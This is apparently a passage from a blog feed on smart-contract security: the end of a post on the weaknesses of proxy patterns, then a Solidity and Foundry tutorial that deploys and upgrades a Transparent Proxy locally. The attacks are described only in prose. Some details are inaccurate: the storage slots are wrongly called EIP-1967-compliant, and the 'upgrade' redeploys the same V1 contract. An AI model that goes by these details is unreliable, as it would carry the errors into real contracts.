-   **Centralization Risk:** If the Beacon contract is compromised, every linked proxy becomes vulnerable. An attacker could redirect all proxies to a malicious implementation.
-   **Unprotected Upgrades:** Without proper access control, the `updateImplementation` function in the Beacon could be exploited to point proxies to an invalid or malicious contract.
-   **Storage Collisions:** Although the Beacon handles the implementation, the proxies themselves hold state. If storage layouts between the proxies and implementation are not aligned, this can lead to corrupted or overwritten data.

## **Minimal Proxy (Clones): Lightweight and Cost-Effective**

Minimal proxies, often implemented using the **EIP-1167** standard, are hyper-efficient proxies designed for gas savings. They delegate all function calls to a single implementation contract. Their minimal bytecode reduces deployment costs, making them ideal for scenarios where you need many identical instances of a contract.

```mermaid
graph LR
    subgraph Proxy1
        P1[&quot;Clone 1 (Minimal Proxy)&quot;]
    end
    subgraph Proxy2
        P2[&quot;Clone 2 (Minimal Proxy)&quot;]
    end
    subgraph Proxy3
        P3[&quot;Clone 3 (Minimal Proxy)&quot;]
    end
    I[&quot;Implementation&quot;]

    P1 --&gt;|Delegate| I
    P2 --&gt;|Delegate| I
    P3 --&gt;|Delegate| I

```

**Key Features:**

-   Extremely low gas costs for deployment.
-   Ideal for mass production of proxies with identical logic.

**Main Vulnerabilities:**

-   **No Built-in Upgradeability:** Minimal proxies are not inherently upgradeable. While you could create a mechanism for upgrading the implementation they delegate to, this is not part of their default design.
-   **Shared Implementation Risks:** Since all clones rely on the same implementation, any bug or vulnerability in the implementation impacts all proxies.
-   **Oversight on Initialization:** Developers must manually initialize the state of each proxy, and improper initialization can lead to inconsistent or exploitable states.

## **Diamond Proxy (EIP-2535): Modular and Extensible**

The Diamond Proxy is the most complex and flexible pattern, allowing a single proxy to delegate calls to multiple implementation contracts, called **facets**. Each facet handles a specific set of functions, enabling modularity and extensibility.

```mermaid
graph TD
    DP[&quot;Diamond Proxy&quot;]
    F1[&quot;Facet 1 (Core Logic)&quot;]
    F2[&quot;Facet 2 (Upgrade Logic)&quot;]
    F3[&quot;Facet 3 (Extensions)&quot;]

    DP --&gt;|Delegate| F1
    DP --&gt;|Delegate| F2
    DP --&gt;|Delegate| F3

```

**Key Features:**

-   Supports modular architecture, where functionality is split across multiple contracts.
-   Allows upgrading individual facets without affecting others.

**Main Vulnerabilities:**

-   **Increased Attack Surface:** Each facet introduces its own entry points and potential vulnerabilities. A single compromised facet can jeopardize the entire system.
-   **Complex Storage Management:** Managing shared storage across multiple facets requires extreme care. A mismatch in storage layouts can corrupt data or cause unexpected behavior.
-   **Access Control Mismanagement:** Ensuring consistent access control across all facets is challenging. If one facet has weaker controls, it could be exploited to affect the entire system.

## **Static Proxy: Immutable Logic, Upgradeable State**

In a Static Proxy, the logic is fixed and cannot be changed. The proxy delegates calls to a single implementation that remains constant, while the proxy itself manages the state. This eliminates the risk of faulty upgrades but sacrifices flexibility.

```mermaid
graph LR
    SP[&quot;Static Proxy&quot;]
    I[&quot;Static Implementation&quot;]
    S[&quot;State Storage&quot;]

    SP --&gt;|Delegate| I
    SP --&gt;|Store State| S

```

**Key Features:**

-   Immutable logic, making it easier to audit and secure.
-   Proxy handles state, while the implementation remains static.

**Main Vulnerabilities:**

-   **Permanent Bugs:** If there’s a bug in the implementation, it cannot be fixed because the logic is immutable. The entire system would need to be redeployed, potentially losing state.
-   **State Migration Risks:** When deploying a new proxy to replace the old one, migrating the state requires careful handling. Errors in migration can lead to data loss or inconsistencies.
-   **Limited Flexibility:** The inability to update logic makes it unsuitable for systems that need to adapt to changing requirements or add new features.

# **Conclusions**

By now, you should have a **very clear** understanding of **UUPS Proxies**, their **benefits**, and the **many ways they can be turned into a disaster** if not handled properly. The shift of **upgrade control from the proxy to the implementation** makes them **more efficient**, but at the same time, it **widens the attack surface**. If access control is weak, an attacker can **upgrade your contract to literally anything**—and you don’t want to wake up one day to find your proxy forwarding calls to a black hole.

What have we learned?

-   **Upgradeability is powerful—but dangerous.** Anything that changes state **needs to be locked down**.
-   **Storage collisions are real.** Misalign your storage, and suddenly, variables start behaving like a drunk oracle.
-   **Never assume that functions will only be called through the proxy.** Attackers _love_ when implementations leave critical functions exposed.
-   **Losing control of an upgrade mechanism is worse than not having one at all.** A misplaced `address(0)` or bad ACL, and your contract is frozen in time—or worse, permanently hijacked.

And the best part? **This is just one type of proxy.**

The world of **proxy-based upgrades is vast**, and UUPS is far from the only game in town. We’ve **only scratched the surface** of how developers attempt to balance **upgradeability and security**. Up next, we’ll **tear apart** some other common proxy architectures—**Beacon Proxies, Minimal Proxies, Diamond Proxies, and Static Proxies**—each with its own unique **design flaws** just waiting to be exploited.

Because at the end of the day, **understanding how to break something is the best way to know how to secure it.** 🚀

### **References**

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. _&quot;Foundry Documentation.&quot;_ Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Understanding delegatecall and Low-Level Functions. _&quot;Solidity Documentation.&quot;_ Available at: [https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call](https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call)
-   **Trail of Bits** - Common Pitfalls with delegatecall. _&quot;Trail of Bits Blog.&quot;_ Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
-   **Storage in Solidity** - Detailed Analysis of Solidity Storage Mechanics. _&quot;Solidity Documentation.&quot;_ Available at: [https://docs.soliditylang.org/en/latest/internals/layout\_in\_storage.html](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. _&quot;Ethereum Whitepaper.&quot;_ Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Anvil** - A Local Ethereum Development Node for Testing Smart Contracts. _&quot;Anvil Documentation.&quot;_ Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. _&quot;OpenZeppelin Contracts Documentation.&quot;_ Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **EIP-1967** - Standardized Storage Slots for Proxy Contracts. _&quot;Ethereum Improvement Proposals.&quot;_ Available at: https://eips.ethereum.org/EIPS/eip-1967
-   **EIP-1822** - Universal Upgradeable Proxy Standard (UUPS). _&quot;Ethereum Improvement Proposals.&quot;_ Available at: https://eips.ethereum.org/EIPS/eip-1822
-   **OpenZeppelin UUPS Proxies** - Best Practices for Secure Upgradeable Contracts. _&quot;OpenZeppelin Documentation.&quot;_ Available at: https://docs.openzeppelin.com/contracts/4.x/api/proxy
-   **Smart Contract Security Best Practices** - A Comprehensive Guide to Securing Upgradeable Contracts. _&quot;Consensys Diligence.&quot;_ Available at: https://consensys.net/diligence/blog/</content:encoded><author>Ruben Santos</author></item><item><title>Transparent Proxies: The Key to Upgradeable Contracts Without Breaking a Sweat</title><link>https://www.kayssel.com/post/web3-11</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-11</guid><description>Transparent Proxies allow smart contracts to be upgraded without changing their address, forwarding calls to implementation contracts while preserving state. In this chapter, we deployed, interacted with, and upgraded a proxy, exploring its architecture and benefits.</description><pubDate>Sun, 26 Jan 2025 09:28:45 GMT</pubDate><content:encoded># Proxies: The Art of Staying Upgradeable Without Losing Your Address

Welcome to the next stop on your Web3 journey—where we explore the not-so-hidden magic behind upgradeable smart contracts. Imagine this: you’ve deployed a smart contract, and everything seems perfect… until someone points out a vulnerability, or worse, you realize you forgot a crucial feature. In traditional deployment, you’d be stuck. But with proxies, you’ve got a lifeline. No need to panic, no need to redeploy—just upgrade the logic while keeping everything else intact. It’s like swapping out the engine of a car without asking the driver to leave.

In this chapter, we’re cracking open **Transparent Proxies**, the simplest tool in the upgradeable smart contract arsenal. They’re straightforward, efficient, and designed to make upgrades seamless without breaking the contract’s address. Why does this matter? Because keeping the address stable is critical—your users, dApps, and auditors rely on that consistency. Proxies allow you to iterate on your code while preserving state and relationships. In short: they give you flexibility while reducing chaos.

Here’s the plan. We’ll start by demystifying how Transparent Proxies work, walking through their architecture and key components (storage slots, delegation, admin control—you name it). Then, we’ll jump into the fun part: deploying a proxy, connecting it to an implementation, and even upgrading it with new logic. Along the way, we’ll break down the code so you can see exactly how everything operates under the hood. This isn’t just a theory session—it’s hands-on, and by the end, you’ll be armed with the knowledge to understand how upgradeable contracts work and how to spot potential security issues.

So, if you’ve ever wondered how a smart contract can evolve without breaking everything around it—or if you’re itching to get a deeper look into how the upgrade process can go wrong (or right)—this chapter has you covered. Let’s dive in and see why proxies are the unsung heroes of upgradeable architectures. 🚀

# **What Are Proxies? The Magic Trick Behind Upgradeable Smart Contracts**

Imagine you own a restaurant, and suddenly you realize the menu is full of mistakes (who thought &quot;screw soup&quot; was a good idea?). Instead of shutting down the restaurant, demolishing the building, and starting over, you simply update the menu. That’s essentially how proxies work in the world of smart contracts!

A proxy is like the manager of that restaurant: it doesn’t hold the menu (the actual logic of your smart contract) but knows exactly where to find it. When a customer (or in this case, a user) comes in and places an order (calls a function), the proxy takes the request and sends it to the kitchen (the implementation contract) to get it done.

Here’s the fun part: if your kitchen (contract logic) has an issue—say, it serves burnt toast as a delicacy—you can build a shiny new kitchen (deploy a new implementation contract) and tell your manager (the proxy) to send all future orders there instead. And voilà, your restaurant (contract address) remains the same for customers, but now you’ve got a better kitchen running the show.

Proxies are the superheroes of **blockchain development** because they allow smart contracts to be **upgraded** without changing their address. This means users don’t need to hunt for a new contract every time you improve the logic or fix a bug. It’s like getting a software update for your favorite app, but on the blockchain.

So, next time someone mentions “proxies,” just think of them as that magical restaurant manager who keeps everything running smoothly, even when the menu gets a makeover. Bon appétit, blockchain style! 🍽️✨

# Transparent Proxies: The Simplest Tool for Upgradeable Smart Contracts

When it comes to upgradeable smart contracts, transparent proxies are like the minimalist’s dream: simple, efficient, and highly functional. They allow you to swap out your smart contract’s logic (the **implementation**) without ever changing its address. That means your users don’t have to worry about keeping track of new contract addresses—they can keep interacting with the same one as if nothing changed.

The key feature of transparent proxies? **They manage the upgrade logic directly within the proxy contract.** Unlike more advanced patterns (like UUPS proxies), where the implementation contract might handle its own upgrades, a transparent proxy centralizes everything. This makes it perfect for straightforward use cases where simplicity is a priority.

Let’s break this down using an example.

&lt;details&gt;
&lt;summary&gt;TransparentProxy code&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract TransparentProxy {
    // Storage slot for the implementation address (EIP-1967-compliant)
    bytes32 private constant IMPLEMENTATION_SLOT = keccak256(&quot;proxy.implementation&quot;);
    // Storage slot for the admin address (EIP-1967-compliant)
    bytes32 private constant ADMIN_SLOT = keccak256(&quot;proxy.admin&quot;);

    event UpgradeAttempt(address sender, address admin, address newImplementation);

    // Constructor to initialize the implementation and admin
    constructor(address initialImplementation, address initialAdmin) {
        require(initialImplementation != address(0), &quot;Implementation cannot be zero address&quot;);
        require(initialAdmin != address(0), &quot;Admin cannot be zero address&quot;);

        _setImplementation(initialImplementation);
        _setAdmin(initialAdmin);
    }

    // Function to update the implementation address
    function upgradeTo(address newImplementation) external {
        emit UpgradeAttempt(msg.sender, _getAdmin(), newImplementation);
        require(msg.sender == _getAdmin(), &quot;Not authorized&quot;);
        require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);

        _setImplementation(newImplementation);
    }

    // Fallback function to delegate calls to the implementation
    fallback() external payable {
        _delegate();
    }

    // Receive function to handle plain Ether transfers
    receive() external payable {
        _delegate();
    }

    function getAdmin() public view returns (address)  {
      return _getAdmin();
    }

    // Internal function to perform the delegatecall to the implementation
    function _delegate() internal {
        address impl = _getImplementation();
        require(impl != address(0), &quot;Implementation not set&quot;);

        assembly {
            // Copy calldata to memory
            calldatacopy(0, 0, calldatasize())

            // Delegate call to the implementation contract
            let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)

            // Copy returndata to memory
            returndatacopy(0, 0, returndatasize())

            // Return or revert based on the result
            switch result
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    // Internal function to retrieve the implementation address
    function _getImplementation() internal view returns (address impl) {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            impl := sload(slot)
        }
    }

    // Internal function to set the implementation address
    function _setImplementation(address newImplementation) internal {
        bytes32 slot = IMPLEMENTATION_SLOT;
        assembly {
            sstore(slot, newImplementation)
        }
    }

    // Internal function to retrieve the admin address
    function _getAdmin() internal view returns (address adm) {
        bytes32 slot = ADMIN_SLOT;
        assembly {
            adm := sload(slot)
        }
    }

    // Internal function to set the admin address
    function _setAdmin(address newAdmin) internal {
        bytes32 slot = ADMIN_SLOT;
        assembly {
            sstore(slot, newAdmin)
        }
    }
}

```
&lt;/details&gt;


## The Transparent Proxy in Action

Here’s a basic implementation of a transparent proxy. Don’t worry—I’ll walk you through each part to make it as clear as possible.

#### Defining Storage Slots

The proxy needs two key storage slots:

1.  **The implementation slot**: This holds the address of the contract with the actual logic.
2.  **The admin slot**: This stores the address of the admin, who has the power to upgrade the implementation.

```solidity
// Storage slot for the implementation address (EIP-1967-compliant)
bytes32 private constant IMPLEMENTATION_SLOT = keccak256(&quot;proxy.implementation&quot;);
// Storage slot for the admin address (EIP-1967-compliant)
bytes32 private constant ADMIN_SLOT = keccak256(&quot;proxy.admin&quot;);

```

These slots follow the **EIP-1967 standard**, which ensures that the storage layout won’t accidentally clash with the implementation contract’s variables. Think of these as clearly labeled drawers in the proxy’s filing cabinet, so you always know where things are.

#### Initializing the Proxy

When deploying the proxy, you need to set:

-   The initial **implementation contract** (where the logic lives).
-   The **admin** address (who’s in charge of upgrades).

```solidity
constructor(address initialImplementation, address initialAdmin) {
    require(initialImplementation != address(0), &quot;Implementation cannot be zero address&quot;);
    require(initialAdmin != address(0), &quot;Admin cannot be zero address&quot;);

    _setImplementation(initialImplementation);
    _setAdmin(initialAdmin);
}

```

The constructor checks that both addresses are valid (not `address(0)`) and then stores them securely in their respective slots. This is like appointing a manager (admin) and telling them where the kitchen (implementation) is located.

#### Handling Upgrades

The `upgradeTo` function is the heart of the proxy’s admin-only control. Here’s how it works:

```solidity
function upgradeTo(address newImplementation) external {
    emit UpgradeAttempt(msg.sender, _getAdmin(), newImplementation);
    require(msg.sender == _getAdmin(), &quot;Not authorized&quot;);
    require(newImplementation != address(0), &quot;New implementation cannot be zero address&quot;);

    _setImplementation(newImplementation);
}

```

1.  **Authorization Check**: It ensures only the admin (stored in the `ADMIN_SLOT`) can call this function.
2.  **Validation**: It verifies the new implementation address isn’t empty.
3.  **Update**: It sets the new implementation address in the `IMPLEMENTATION_SLOT`.

This function also emits an event, `UpgradeAttempt`, to log who tried to upgrade and what the new implementation address is.

#### Delegating Calls

The proxy itself doesn’t execute any logic. Instead, it forwards all incoming calls to the implementation contract using a fallback function. Here’s the magic:

```solidity
fallback() external payable {
    _delegate();
}

receive() external payable {
    _delegate();
}

```

The `fallback` function handles all calls except plain Ether transfers, while the `receive` function deals with Ether-only transactions. Both call `_delegate`, which is where the real action happens.

#### The `_delegate` Function

&lt;details&gt;
&lt;summary&gt;This is where the proxy forwards calls to the implementation contract:&lt;/summary&gt;

```solidity
function _delegate() internal {
    address impl = _getImplementation();
    require(impl != address(0), &quot;Implementation not set&quot;);

    assembly {
        // Copy calldata to memory
        calldatacopy(0, 0, calldatasize())

        // Delegate call to the implementation contract
        let result := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)

        // Copy returndata to memory
        returndatacopy(0, 0, returndatasize())

        // Return or revert based on the result
        switch result
        case 0 { revert(0, returndatasize()) }
        default { return(0, returndatasize()) }
    }
}

```
&lt;/details&gt;


Let’s break it down:

1.  **Get the Implementation Address**: The proxy retrieves the current implementation address from the `IMPLEMENTATION_SLOT`.
2.  **Forward the Call**: It uses the `delegatecall` opcode to execute the function on the implementation contract.
3.  **Return Results**: The proxy copies any return data back to the caller or reverts if the call failed.

This process makes the proxy behave exactly like the implementation contract for external users. They’ll never know the difference.

#### Setting and Retrieving Slots

Finally, the proxy includes helper functions to read and write to the `ADMIN_SLOT` and `IMPLEMENTATION_SLOT`. These are used internally to manage the admin and implementation addresses.

```solidity
function _getImplementation() internal view returns (address impl) {
    bytes32 slot = IMPLEMENTATION_SLOT;
    assembly {
        impl := sload(slot)
    }
}

function _setImplementation(address newImplementation) internal {
    bytes32 slot = IMPLEMENTATION_SLOT;
    assembly {
        sstore(slot, newImplementation)
    }
}

function _getAdmin() internal view returns (address adm) {
    bytes32 slot = ADMIN_SLOT;
    assembly {
        adm := sload(slot)
    }
}

function _setAdmin(address newAdmin) internal {
    bytes32 slot = ADMIN_SLOT;
    assembly {
        sstore(slot, newAdmin)
    }
}

```

These functions use low-level assembly to interact directly with the contract’s storage slots, ensuring that the proxy always knows where to find the admin and implementation addresses.

# A Simple Implementation to Test the Proxy

To test our transparent proxy in action, we’ll use a straightforward contract: **ImplementationV1**. This contract includes a few basic functions, such as storing and retrieving a value, as well as a version identifier.

Here’s the code for **ImplementationV1**:

```solidity
pragma solidity ^0.8.0;

contract ImplementationV1 {
    uint256 public storedValue;

    function getVersion() public pure returns (string memory) {
        return &quot;v1&quot;;
    }

    function setStoredValue(uint256 value) external {
        storedValue = value;
    }

    function getStoredValue() external view returns (uint256) {
        return storedValue;
    }
}

```

## What’s Happening Here?

1.  `**getVersion()**`: This function simply returns the version of the contract (in this case, `&quot;v1&quot;`). It’s a quick way to confirm which implementation the proxy is pointing to after an upgrade.
2.  **`setStoredValue()`**: This allows us to store a value in the contract. It demonstrates how state is preserved across upgrades, as the state lives in the proxy, not the implementation.
3.  **`getStoredValue()`**: This retrieves the stored value, giving us an easy way to test the logic and verify that everything is working as expected.

## What Comes Next?

When we decide to upgrade, we’ll replace **ImplementationV1** with a new version (e.g., **ImplementationV2**) that includes additional functionality or fixes. For example, we might update the `getVersion()` function to return `&quot;v2&quot;`. This allows us to see the proxy&apos;s magic in action—changing the logic without losing access to the stored data.

Stay tuned, because next, we’ll deploy **ImplementationV1**, connect it to our proxy, and demonstrate how to upgrade seamlessly!

# Testing the Transparent Proxy: Deploying and Interacting

Now that we’ve built our **Transparent Proxy** and **ImplementationV1** contracts, it’s time to see them in action. For this, we’ll deploy the contracts and interact with them using **Foundry**, an excellent toolkit for Ethereum developers. To simulate the blockchain environment, we’ll rely on **Anvil**, Foundry’s local testnet. The following script takes care of deploying both the implementation and proxy contracts while ensuring everything is initialized properly.

#### The Deployment Script

The deployment starts with the **`run()`** function. This function uses Foundry&apos;s scripting utilities to deploy the contracts to the blockchain.

```solidity
contract Deploy is Script {
    function run() external {
        // Start broadcasting transactions
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        // Step 1: Deploy the ImplementationV1 contract
        ImplementationV1 implementation = new ImplementationV1();
        console.log(&quot;ImplementationV1 deployed at:&quot;, address(implementation));

        // Step 2: Deploy the Transparent Proxy contract
        TransparentProxy proxy = new TransparentProxy(address(implementation), vm.envAddress(&quot;ADMIN_ADDR&quot;));
        console.log(&quot;TransparentProxy deployed at:&quot;, address(proxy));

        // End broadcasting transactions
        vm.stopBroadcast();
    }
}

```

The script first broadcasts transactions by calling `vm.startBroadcast()` and using the admin&apos;s private key (`ADMIN_KEY`), which is securely passed via environment variables. This allows the admin to deploy and manage the contracts on the blockchain.

The first task is deploying **ImplementationV1**, which contains the logic for storing and retrieving values. The line `ImplementationV1 implementation = new ImplementationV1();` creates a new instance of this contract and logs its address to the console for reference. This contract acts as the &quot;kitchen&quot; we discussed earlier—the place where all the logic lives.

Next, the script deploys the **Transparent Proxy** by creating a new instance of it and passing two critical parameters: the address of the implementation contract (`address(implementation)`) and the admin’s address (`vm.envAddress(&quot;ADMIN_ADDR&quot;)`). These parameters initialize the proxy, linking it to the implementation contract and setting the admin who will manage future upgrades. The proxy’s address is also logged for easy access.

Once both contracts are deployed, the script ends by calling `vm.stopBroadcast()`, signaling that no more transactions will be sent.

#### Running the Deployment Script

To deploy the contracts, you’ll first need to start Anvil. This creates a local Ethereum blockchain that mimics a real network, complete with accounts and transaction history. You can start Anvil by running:

```anvil
anvil

```

Next, set up your environment variables to securely pass the admin’s private key and address to the script. These can be added to a `.env` file like so:

```bash
ADMIN_KEY=&lt;your-private-key&gt;
ADMIN_ADDR=&lt;your-admin-address&gt;

```

To make things simpler, you can configure the `**foundry.toml**` file to include your default RPC URL. This way, you won’t need to specify `--rpc-url` every time you interact with the blockchain. Add the following line to your **`foundry.toml`** file:

```solidity
eth_rpc_url = &quot;http://127.0.0.1:8545&quot;

```

With Anvil running and the environment variables set, deploy the contracts using Foundry:

```solidity
forge script script/Deploy.s.sol --broadcast

```

This command compiles the contracts, runs the deployment script, and deploys everything to your local Anvil network.

![](/content/images/2025/01/image-7.png)

Deployment of the contracts

# Interacting with the Transparent Proxy Using Foundry Scripts

Now that the Transparent Proxy is deployed, it’s time to interact with it and see how it handles calls to the implementation contract. For this, we’ll use a simple Foundry script. To keep things clean and modular, we’ll define an interface to specify the functions we want to call on the proxy. This is just a convenient way to interact with the contract without pulling in its entire codebase.

Here’s the script we’ll use:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;

interface ProxyInterface {
    function setStoredValue(uint256 value) external;
    function getStoredValue() external view returns (uint256);
    function upgradeTo(address newImplementation) external;
    function getVersion() external view returns (string memory);
}

contract Interacting is Script {
    // Reference the deployed Transparent Proxy
    ProxyInterface transparentProxy = ProxyInterface(0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512);

    function run() external {
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        transparentProxy.setStoredValue(150);
        console.log(&quot;Value set to 150&quot;);

        uint256 value = transparentProxy.getStoredValue();
        console.log(&quot;Retrieved Value: &quot;, value);

        vm.stopBroadcast();
    }
}

```

In this script, the Transparent Proxy is referenced by its address, which is passed into the `ProxyInterface`. This address (`0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512`) should be replaced with the actual address of the proxy from your deployment. The `ProxyInterface` gives us access to the functions we want to call, like `setStoredValue` and `getStoredValue`.

The action starts in the `run` function. It begins by broadcasting transactions using `vm.startBroadcast` with the admin’s private key. This step is crucial because interacting with the proxy requires valid blockchain transactions, which need to be signed by the admin. Once broadcasting is live, the script sets a value by calling `setStoredValue(150)` through the proxy. The call is routed to the implementation contract, and the new value is stored there. To confirm the operation, `console.log` is used to print a message to the console.

After setting the value, the script retrieves it using the `getStoredValue` function. This call also goes through the proxy, which forwards it to the implementation contract. The returned value is logged, allowing us to verify that the proxy is forwarding calls correctly and that the state has been updated as expected.

Finally, the script stops broadcasting with `vm.stopBroadcast`, marking the end of the interaction. The whole process demonstrates the proxy’s ability to forward function calls seamlessly while maintaining the state in the implementation contract.

Running this script is simple, and you’ll see the results directly in the console. It’s a straightforward way to test the functionality of the Transparent Proxy and ensure everything is working as intended. You can build on this script to test upgrades or add more complex interactions, but for now, it’s a solid foundation to understand how the proxy operates 😄

```solidity
forge script script/DeployFirstCase.sol --tc Interacting --broadcast

```

![](/content/images/2025/01/image-8.png)

Interacting with the Proxy

# Updating the Implementation: Upgrading the Transparent Proxy

Once the Transparent Proxy is deployed and working, the next step is to upgrade its underlying implementation. This process allows us to deploy a new version of the implementation contract and point the proxy to the updated version, ensuring the contract logic evolves while maintaining the same proxy address. Below is the Foundry script to perform the upgrade, along with a detailed explanation of how it works.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;

interface ProxyInterface {
    function setStoredValue(uint256 value) external;
    function getStoredValue() external view returns (uint256);
    function upgradeTo(address newImplementation) external;
    function getVersion() external view returns (string memory);
}

contract UpdatingImplementation is Script {
    // Reference the deployed Transparent Proxy
    ProxyInterface proxy = ProxyInterface(0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512);

    function run() external {
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        // Deploy the new implementation contract
        ImplementationV1 implementation = new ImplementationV1();
        console.log(&quot;ImplementationV1 deployed at:&quot;, address(implementation));

        // Display the current implementation version
        console.log(&quot;Current Version: &quot;, proxy.getVersion());

        // Upgrade the proxy to use the new implementation
        proxy.upgradeTo(address(implementation));

        // Verify the new implementation version
        console.log(&quot;New Version: &quot;, proxy.getVersion());

        vm.stopBroadcast();
    }
}

```

This script handles the upgrade process step by step, starting with the deployment of a new implementation contract and ending with a verification of the upgrade. Here’s how it works:

The `ProxyInterface` allows the script to interact with the proxy, specifically calling the `upgradeTo` and `getVersion` functions. The proxy is referenced by its deployed address (`0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512`), which you should replace with the actual proxy address from your deployment.

The script begins by broadcasting transactions using `vm.startBroadcast` with the admin’s private key. This ensures that the transactions are properly signed and authorized. The admin then deploys the new implementation contract by creating an instance of `ImplementationV1`. The script logs the new implementation’s address for reference.

After deploying the new implementation, the script retrieves and logs the current implementation version by calling `proxy.getVersion()`. This confirms the current state of the proxy before the upgrade.

The `upgradeTo` function is then called on the proxy, passing the address of the newly deployed implementation contract. This updates the proxy to point to the new implementation. The script follows up by calling `proxy.getVersion()` again to confirm that the proxy is now using the updated implementation.

Finally, `vm.stopBroadcast` is called to end the transaction broadcasting, completing the upgrade process.

```bash
forge script script/DeployFirstCase.sol --tc UpdatingImplementation --broadcast

```

![](/content/images/2025/01/image-11.png)

Upgrading the Implementation

# Common Vulnerabilities in Transparent Proxies

Transparent Proxies are undeniably useful, but like any powerful tool, they come with their own set of risks. Knowing the common vulnerabilities in these proxies is essential for anyone looking to implement or audit them effectively.

One major issue often encountered is **unrestricted upgrade access**. If the `upgradeTo` function isn’t properly protected, a malicious actor could exploit it to deploy their own version of the implementation contract, potentially stealing funds or breaking functionality. This highlights the importance of tightly controlling the admin address and ensuring only authorized parties can manage upgrades. Multi-signature wallets are a great way to reduce the risk of a single point of failure.

Another critical [vulnerability is **storage collision**](https://www.kayssel.com/post/web3-9/). Transparent Proxies rely on specific storage slots, such as `ADMIN_SLOT` and `IMPLEMENTATION_SLOT`, to store critical data. If an implementation contract accidentally overlaps with these reserved slots, it can corrupt the proxy’s state and lead to unexpected behavior. Following the EIP-1967 standard for storage slots is a best practice to avoid these conflicts.

The implementation contract itself can also introduce vulnerabilities, such as through [**delegatecall exploits**](https://www.kayssel.com/post/web3-10/). Since the proxy uses `delegatecall` to execute functions in the implementation’s context, any malicious or poorly written code in the implementation can manipulate the proxy’s state. This makes thorough auditing of the implementation contract critical. Reentrancy attacks, unchecked inputs, or careless state manipulation in the implementation are common areas to scrutinize.

A subtle but devastating risk is **losing admin privileges**. If the admin address is ever set to `address(0)` or another unintended address, the proxy can no longer be managed, effectively freezing its state. This makes it essential to validate all admin changes and include recovery mechanisms, such as a time-lock or an emergency reset option.

Lastly, there’s the danger of **malicious upgrades**. Even when the upgrade process itself is secure, a poorly vetted or intentionally malicious new implementation can introduce backdoors, corrupt storage, or otherwise compromise the proxy’s integrity. Implementing validation checks and allowing time for audits before deploying upgrades is a good practice to avoid such scenarios.

# Wrapping Up: Proxies in Action

Transparent Proxies, as we’ve seen, are a simple yet powerful tool for making smart contracts upgradeable. They act as the middleman, forwarding user calls to the implementation contract while ensuring the contract&apos;s address and state remain stable. We’ve explored their inner workings, deployed them, interacted with them, and even upgraded them seamlessly. By now, you should have a solid understanding of how they operate and why they’re a go-to choice in the world of smart contracts.

From their admin-controlled upgrades to their ability to separate logic from storage, Transparent Proxies make the upgrade process straightforward. However, they’re not without their limitations. For instance, the reliance on centralized admin control can introduce risks if not properly secured. That’s where more advanced patterns like **UUPS Proxies** come into play, offering a slightly different approach to the upgrade process.

In the next chapter, we’ll dive into **UUPS Proxies (Universal Upgradeable Proxy Standard)**. You’ll learn how they differ from Transparent Proxies, why they’re favored for reducing gas costs, and how their upgrade logic shifts from the proxy to the implementation contract itself. If you thought Transparent Proxies were cool, wait until you see UUPS in action.

So, buckle up, because we’re taking your knowledge of proxies to the next level. Until then, keep exploring, testing, and thinking critically about how these tools can be both a feature and a potential attack surface. Onward to UUPS! 🚀

# References

1.  Foundry - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
2.  Solidity - Understanding `delegatecall` and Low-Level Functions. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call](https://docs.soliditylang.org/en/latest/introduction-to-smart-contracts.html#delegatecall-callcode-and-call)
3.  Trail of Bits - Common Pitfalls with `delegatecall`. &quot;Trail of Bits Blog.&quot; Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
4.  Storage in Solidity - Detailed Analysis of Solidity Storage Mechanics. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/en/latest/internals/layout\_in\_storage.html](https://docs.soliditylang.org/en/latest/internals/layout_in_storage.html)
5.  Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
6.  Anvil - A Local Ethereum Development Node for Testing Smart Contracts. &quot;Anvil Documentation.&quot; Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
